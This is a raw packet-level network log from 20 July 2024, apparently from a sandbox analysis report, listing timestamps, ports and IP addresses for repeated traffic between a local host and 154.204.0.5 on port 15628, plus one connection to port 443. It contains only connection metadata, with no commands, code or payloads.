Jul 20, 2024 16:31:12.087340117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.092317104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.092361927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.097903013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.097954035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.106895924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.106952906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.126106024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.126163960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.131078005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.131133080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.136293888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.136348009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.141319036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.141374111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.146658897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.146719933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.152960062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.153022051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.157977104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.158034086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.169953108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.170022964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.177690983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.177757978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.211023092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.228384972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.228463888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.228506088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.230494976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.230534077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.234381914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.234432936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.245459080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.245469093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.245513916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.255985975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.256047964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.260927916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.260983944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.266422033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.266491890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.271387100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.271442890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.276355982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.276411057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.281296015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.281356096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.286252975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.286310911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.292242050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.292299032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.297406912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.297492981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.302725077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.302788019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.307889938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.307979107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.312829971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.312944889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.317795992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.318064928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.322966099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.323256016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.328310966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.328505993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.333390951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.333637953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.339617968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.339760065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.345552921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.345758915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.350739002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.351376057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.356359959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.356509924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.362008095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.362519026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.370930910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.371258020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.377194881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.377561092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.382420063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.382781982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.388220072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.388403893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.394257069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.394390106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.401235104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.401351929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.406678915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.406816959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.412475109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.412651062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.419256926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.419406891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.424595118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.424721003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.429800034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.436049938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.441226006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.443706036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.455470085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.456063986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.461128950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.461484909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.469506979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.469634056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.474610090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.476322889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.481722116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.483717918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.489995003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.490446091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.500227928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.505887985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.515530109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.516151905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.521133900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.521389008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.526304007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.526534081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.531685114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.537657976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.542567015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.543929100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.548840046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.549235106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.556731939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.557987928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.565296888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.565545082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.573610067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.576518059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.581336975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.584273100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.590075970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.590249062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.591965914 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:31:12.591985941 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:31:12.595117092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.595316887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.600203037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.603662968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.608589888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.612343073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.617400885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.619980097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.624991894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.627849102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.632854939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.636322021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.641551018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.643802881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.648682117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.651729107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.675134897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.676317930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.686971903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.689450979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.695278883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.695931911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.701562881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.704708099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.709974051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.712481022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.717541933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.717745066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.723095894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.723206043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.728087902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.732440948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.737418890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.739728928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.744628906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.744848967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.750839949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.751652002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.758043051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.761950970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.769751072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.774207115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.780262947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.780690908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.785862923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.788269043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.793323994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.793574095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.798508883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.801636934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.809847116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.811589003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.816735983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.817295074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.822309971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.823302984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.828159094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.828279972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.833254099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.837678909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.842850924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.845633984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.850517035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.853921890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.861784935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.865875006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.870922089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.871802092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.876740932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.879719973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.885678053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.885888100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.891431093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.892297029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.897819042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.897898912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.902894020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.902972937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.907936096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.908214092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.913100004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.913398981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.921869040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.922558069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.927637100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.927880049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.932809114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.932971001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.937903881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.939105988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.943968058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.944103956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.949069977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.949157000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.954087973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.954612017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.959640026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.960007906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.965095043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.965363026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.970227957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.970393896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.975281000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.977642059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.982618093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.983288050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.988177061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.988529921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:12.993398905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:12.993585110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.000910044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.000984907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.007781029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.007985115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.013036013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.013184071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.021945000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.022468090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.027580023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.028448105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.033427000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.034085989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.039057970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.039532900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.044449091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.044884920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.050348997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.052398920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.058795929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.058948994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.065202951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.068151951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.073139906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.073565006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.078618050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.078733921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.083583117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.083700895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.088591099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.089287996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.095918894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.096283913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.103094101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.103681087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.108551979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.109867096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.160414934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.160615921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.165688992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.166378975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.168365002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.168539047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.171336889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.171499014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.174993992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.175595999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.181436062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.181679964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.190118074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.190262079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.199117899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.200217962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.208833933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.209137917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.219995975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.220388889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.225271940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.225436926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.230706930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.230815887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.235939026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.239547014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.244410038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.244530916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.249979973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.250138044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.255069971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.255322933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.260261059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.260580063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.265532970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.265623093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.270596027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.270945072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.275814056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.275958061 CEST	49722	15628	192.168.2.6	154.204.0.5
